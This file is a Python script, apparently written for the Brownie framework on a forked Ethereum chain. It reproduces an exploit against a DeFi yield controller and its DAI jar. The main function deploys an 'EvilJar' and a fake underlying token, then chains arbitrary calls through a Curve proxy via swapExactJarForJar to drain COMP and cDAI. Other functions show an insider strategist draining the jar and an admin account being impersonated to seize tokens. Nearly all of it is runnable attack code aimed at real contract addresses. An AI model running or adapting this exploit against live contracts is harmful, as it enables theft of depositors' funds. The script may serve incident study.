def seize():
penguin = accounts.at('0x907d9b32654b8d43e8737e0291ad9bfcce01dad6',
force=True)
strategy = interface.Strategy('0xCd892a97951d46615484359355e3Ed88131f829D')
controller = interface.ControllerV4(
"0x6847259b2B3A4c17e7c43C54409810aF48bA5210")
comp = interface.ERC20("0xc00e94Cb662C3520282E6f5717214004A7f26888")
print('comp strategy', comp.balanceOf(strategy).to('ether'))
controller.inCaseStrategyTokenGetStuck(strategy, comp, {'from': penguin})
print('comp controller', comp.balanceOf(controller).to('ether'))
controller.inCaseTokensGetStuck(comp, comp.balanceOf(controller),
{'from': penguin})
print('comp penguin', comp.balanceOf(penguin).to('ether'))
def insider_hack():
strategy = interface.Strategy("0xCd892a97951d46615484359355e3Ed88131f829D")
strategist = accounts.at(strategy.strategist(), force=True) # EOA
controller = interface.ControllerV4(
"0x6847259b2B3A4c17e7c43C54409810aF48bA5210")
dai = interface.ERC20("0x6B175474E89094C44Da98b954EedeAC495271d0F")
cdai = interface.ERC20("0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643")
jar = interface.PickleJar(controller.jars(dai))
def status():
contracts = {
"jar": jar,
"strategy": strategy,
"strategist": strategist,
}
data = []
for name, c in contracts.items():
data.append([
name,
dai.balanceOf(c).to("ether"),
cdai.balanceOf(c) / 1e8,
])
print(tabulate(data, headers=["contract", "dai", "cdai"]))
status()
controller.withdrawAll(dai, {"from": strategist})
status()
for i in range(3):
jar.earn({"from": strategist})
status()
controller.inCaseStrategyTokenGetStuck(strategy, cdai,
{"from": strategist})
status()
controller.inCaseTokensGetStuck(cdai, cdai.balanceOf(controller),
{"from": strategist})
status()
def main():
assert rpc.is_active()
hacker = accounts[0]
controller = interface.ControllerV4(
"0x6847259b2B3A4c17e7c43C54409810aF48bA5210")
dai = interface.ERC20("0x6B175474E89094C44Da98b954EedeAC495271d0F")
cdai = interface.ERC20("0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643")
comp = interface.ERC20("0xc00e94Cb662C3520282E6f5717214004A7f26888")
curve_proxy_logic = interface.CurveProxyLogic(
"0x6186E99D9CFb05E1Fdf1b442178806E81da21dD8")
jar = interface.PickleJar(controller.jars(dai))
strategy = interface.Strategy(controller.strategies(dai))
print("jar", jar)
print("strategy", strategy)
steal = comp
evil_jar = EvilJar.deploy(steal, {"from": hacker})
fake_underlying = FakeUnderlying.deploy(steal, {"from": hacker})
contracts = {
"controller": controller,
"strategy": strategy,
"dai jar": jar,
"evil jar": evil_jar,
"fake underlying": fake_underlying,
"hacker": hacker,
}
def status():
data = []
for name, c in contracts.items():
data.append([
name,
dai.balanceOf(c).to("ether"),
cdai.balanceOf(c) / 1e8,
comp.balanceOf(c) / 1e18,
])
print(tabulate(data, headers=["contract", "dai", "cdai", "comp"]))
status()
def arbitrary_call(to, sig, param=None):
param = steal if param is None else fake_underlying
return curve_proxy_logic.add_liquidity.encode_input(
to,
sig[:10],
1,
0,
param,
)
earns = 3
datas = ([arbitrary_call(strategy, strategy.withdrawAll.encode_input())] +
[arbitrary_call(jar, jar.earn.encode_input())] * earns + [
arbitrary_call(
strategy,
strategy.withdraw["address"].encode_input(steal), True)
])
targets = [curve_proxy_logic for _ in datas]
tx = controller.swapExactJarForJar(
evil_jar,
evil_jar,
0,
0,
targets,
datas,
{"from": hacker},
)
status()